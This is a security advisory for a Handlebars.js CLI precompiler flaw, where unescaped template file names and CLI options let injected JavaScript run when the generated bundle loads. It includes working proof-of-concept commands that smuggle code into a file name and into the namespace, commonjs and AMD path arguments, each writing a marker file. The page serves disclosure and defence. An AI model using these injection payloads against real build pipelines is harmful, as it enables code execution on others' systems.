CVE-2026-33941

HIGH8.2EPSS 0.01%

Handlebars.js has JavaScript Injection in CLI Precompiler via Unescaped Names and Options

Published: 3/27/2026Modified: 3/30/2026
Also known as:GHSA-xjpj-3mr7-gcpfCGA-c4xq-whv6-wpv8

Description

## Summary The Handlebars CLI precompiler (`bin/handlebars` / `lib/precompiler.js`) concatenates user-controlled strings — template file names and several CLI options — directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser. ## Description `lib/precompiler.js` generates JavaScript source by string-interpolating several values directly into the output. Four distinct injection points exist: ### 1. Template name injection ```javascript // Vulnerable code pattern output += 'templates["' + template.name + '"] = template(...)'; ``` `template.name` is derived from the file system path. A filename containing `"` or `'];` breaks out of the string literal and injects arbitrary JavaScript. ### 2. Namespace injection (`-n` / `--namespace`) ```javascript // Vulnerable code pattern output += 'var templates = ' + opts.namespace + ' = ' + opts.namespace + ' || {};'; ``` `opts.namespace` is emitted as raw JavaScript. Anything after a `;` in the value becomes an additional JavaScript statement. ### 3. CommonJS path injection (`-c` / `--commonjs`) ```javascript // Vulnerable code pattern output += 'var Handlebars = require("' + opts.commonjs + '");'; ``` `opts.commonjs` is interpolated inside double quotes with no escaping, allowing `"` to close the string and inject further code. ### 4. AMD path injection (`-h` / `--handlebarPath`) ```javascript // Vulnerable code pattern output += "define(['" + opts.handlebarPath + "handlebars.runtime'], ...)"; ``` `opts.handlebarPath` is interpolated inside single quotes, allowing `'` to close the array element. All four injection points result in code that executes when the generated bundle is `require()`d or loaded in a browser. ## Proof of Concept **Template name vector (creates a file `pwned` on disk):** ```bash mkdir -p templates printf 'Hello' > "templates/evil'] = (function(){require(\"fs\").writeFileSync(\"pwned\",\"1\")})(); //.handlebars" node bin/handlebars templates -o out.js node -e 'require("./out.js")' # Executes injected code, creates ./pwned ``` **Namespace vector:** ```bash node bin/handlebars templates -o out.js \ -n "App.ns; require('fs').writeFileSync('pwned2','1'); //" node -e 'require("./out.js")' ``` **CommonJS vector:** ```bash node bin/handlebars templates -o out.js \ -c 'handlebars"); require("fs").writeFileSync("pwned3","1"); //' node -e 'require("./out.js")' ``` **AMD vector:** ```bash node bin/handlebars templates -o out.js -a \ -h "'); require('fs').writeFileSync('pwned4','1'); // " node -e 'require("./out.js")' ``` ## Workarounds - **Validate all CLI inputs** before invoking the precompiler. Reject filenames and option values that contain characters with JavaScript string-escaping significance (`"`, `'`, `;`, etc.). - **Use a fixed, trusted namespace string** passed via a configuration file rather than command-line arguments in automated pipelines. - **Run the precompiler in a sandboxed environment** (container with no write access to sensitive paths) to limit the impact of successful exploitation. - **Audit template filenames** in any repository or package that is consumed by an automated build pipeline.

Affected packages (2)

CVSS scores

SourceVersionSeverityVector
osvCVSS 3.1HIGH8.2CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

References (6)